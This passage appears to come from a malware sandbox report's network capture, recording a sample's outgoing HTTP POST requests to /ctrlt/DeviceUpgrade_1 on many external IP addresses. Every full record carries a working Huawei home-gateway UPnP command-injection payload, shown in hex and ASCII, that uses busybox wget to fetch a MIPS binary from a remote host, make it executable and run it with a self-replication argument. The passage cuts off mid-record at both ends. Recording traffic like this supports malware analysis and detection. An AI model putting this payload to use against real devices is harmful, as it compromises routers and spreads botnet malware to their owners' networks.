20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1705192.168.2.1539136197.164.79.21737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.941956043 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1706192.168.2.153972241.10.203.8837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.942329884 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1707192.168.2.154252641.123.98.19837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.942758083 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1708192.168.2.1541518157.75.73.2437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.942773104 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1709192.168.2.1556426194.61.204.6037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.943274975 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1710192.168.2.1545700197.118.202.22537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.943291903 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1711192.168.2.155252841.46.12.537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.943340063 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1712192.168.2.1532800197.139.38.4737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.947582960 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1713192.168.2.1539696197.214.164.20037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.948096991 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1714192.168.2.1539150197.48.159.8337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.948513985 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1715192.168.2.1545704157.68.38.3037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.948843002 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
